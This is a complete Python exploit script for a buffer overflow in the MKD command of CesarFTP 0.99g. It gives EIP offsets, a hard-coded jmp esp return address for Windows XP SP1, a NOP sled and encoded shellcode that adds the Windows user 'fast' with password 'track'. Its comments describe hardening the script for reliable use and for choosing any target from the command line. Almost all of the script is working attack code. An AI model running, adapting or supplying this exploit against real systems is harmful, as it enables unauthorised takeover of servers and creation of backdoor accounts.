#!/usr/bin/python
import socket
import sys
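s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bound every connect()/recv() below. Without a timeout the script hangs
# forever if the target accepts the TCP connection but never sends a
# banner or a reply (a half-dead or firewalled service); socket.timeout
# is raised instead so the operator sees the failure.
s.settimeout(10)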
#----------------------------------------------------------------
#EIP 674; (AAA=required for padding)
#buffer = "\n"*671 + "AAA" + "BBBB" + "C"*300 === basic buffer (=978)
#jmp esp 77D718FC - USER32.dll xp sp1 (address is specific to that OS/service-pack build; re-locate it for any other target)
#buffer = "\n"*671 + "pattern_create(307)" ==> EIP = 3; ESP = 7 (offsets within the pattern, i.e. 674 / 678 absolute)
#free space for shellcode = 288
#bad chars: \x00 \x20 \x0a \x0d (apply to the shellcode region; the "\n" filler in front of EIP is deliberate)
#win32_adduser - PASS=track EXITFUNC=seh USER=fast Size=235 Encoder=ShikataGaNai
#----------------------------------------------------------------
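# Payload: win32_adduser (USER=fast / PASS=track), ShikataGaNai-encoded,
# 235 bytes as documented above. Byte literals are used so the buffer is
# bytes on both Python 2 (where b"" is str) and Python 3.
shellcode = (
    b"\x2b\xc9\xdb\xd3\xd9\x74\x24\xf4\xbb\x44\x73\xdf\xf9\xb1\x35\x5e"
    b"\x83\xc6\x04\x31\x5e\x11\x03\x1a\x62\x3d\x0c\x5e\x6c\x85\xef\x9e"
    b"\x6d\x8d\xb5\xa2\xe6\xed\x30\xa2\xf9\xe2\xb0\x1d\xe2\x77\x99\x81"
    b"\x13\x63\x6f\x4a\x27\xf8\x71\xa2\x79\x3e\xe8\x96\xfe\x7e\x7f\xe1"
    b"\x3f\xb4\x8d\xec\x7d\xa2\x7a\xd5\xd5\x11\x87\x5c\x33\xd2\xd8\xba"
    b"\xba\x0e\x80\x49\xb0\x9b\xc6\x12\xd5\x1a\x32\x27\xf9\x97\xc5\xdc"
    b"\x8b\xf4\xe1\x26\x4f\x35\x2a\x42\xc4\x76\x9a\x0f\x1a\x0e\xd6\x84"
    b"\xdb\xe3\x6d\xea\xc7\x56\xfa\x62\xf0\x43\xf4\xf9\x80\x24\x07\xfd"
    b"\x80\xcf\x60\xc1\xdf\xfe\x86\x59\xb6\x89\x9f\x1a\xf6\xf1\x0f\x74"
    b"\x07\x8f\xb4\xdb\x8f\x08\x4a\x69\x41\x7e\x4c\x8a\x3d\xed\xd6\x7a"
    b"\xa7\x95\x73\xa2\x08\x05\x5c\xcc\x33\xbd\xbc\x65\xcf\x58\xcf\xa5"
    b"\x49\xc2\x5c\xd1\xb5\x70\xd1\x78\xd5\x13\x35\x55\x58\xa0\x71\x89"
    b"\x7c\x0e\x5a\xa7\xe5\x3a\xba\x5b\x89\xa1\xdb\xcf\x32\x54\x73\x7a"
    b"\xcd\xb8\xca\xe0\x40\xd0\xa2\x81\xe9\x56\x49\x30\x7a\xf8\xdf\xc1"
    b"\xa2\x60\x41\x56\xd7\x4c\xae\xd9\x53\xc9\xb0"
)

# The bad chars listed in the header must not appear in the shellcode
# (the "\n" filler in front of EIP is intentional and is not covered by
# this check). Fail loudly here rather than send a payload that the
# server will truncate or mangle.
for _bad in (b"\x00", b"\x20", b"\x0a", b"\x0d"):
    if _bad in shellcode:
        raise ValueError("shellcode contains bad char %r" % _bad)

# Layout, from the offsets measured above:
#   671 x "\n"  filler up to the 3 alignment bytes
#   "AAA"       alignment padding (EIP sits at 674)
#   RET_ADDR    0x77D718FC jmp esp in USER32.dll (XP SP1), little-endian
#   NOP sled    16 bytes, landing zone for ESP (678)
#   shellcode   235 bytes
#   "\xcc" tail int3 filler that keeps the total at the original 978 bytes
# NOP sled + shellcode = 251 bytes, inside the 288 bytes noted as free above.
RET_ADDR = b"\xFC\x18\xD7\x77"
NOP_SLED = b"\x90" * 16
TAIL = b"\xcc" * 49
EXPECTED_LEN = 978

# Name kept for the MKD send below; note it shadows the Python 2 builtin `buffer`.
buffer = b"\n" * 671 + b"AAA" + RET_ADDR + NOP_SLED + shellcode + TAIL

# Guard the arithmetic: every offset above was measured against a 978-byte
# buffer, so a different length means the layout no longer matches.
if len(buffer) != EXPECTED_LEN:
    raise ValueError("buffer is %d bytes, expected %d" % (len(buffer), EXPECTED_LEN))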
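# Target host can be given on the command line; the original hard-coded
# lab address stays as the default so existing invocations keep working.
target = sys.argv[1] if len(sys.argv) > 1 else '192.168.1.70'
PORT = 21

print("\nConnecting to CesarFTP 0.99g")
print("\nCreating User Account (u:fast/pw:track)")
print("\nAll your services @re belong to us...")


def _ftp(cmd):
    """Send one FTP command line on `s` and return the reply read back.

    sendall() is used instead of send(): send() may write only part of
    the data and the original silently ignored its return value.
    """
    s.sendall(cmd + b'\r\n')
    return s.recv(1024)


# try/finally so the socket is closed even when connect()/recv() raises
# (the original leaked it on any error before s.close()).
try:
    s.connect((target, PORT))
    # Replies are printed so a failed connection or login is visible to
    # the operator instead of being discarded as the original did.
    print(s.recv(1024).rstrip())            # banner
    print(_ftp(b'USER ftp').rstrip())
    print(_ftp(b'PASS ftp').rstrip())
    # The overflow is in the MKD argument. The original never waited for a
    # reply to this command, so none is read here either.
    s.sendall(b'MKD ' + buffer + b'\r\n')
finally:
    s.close()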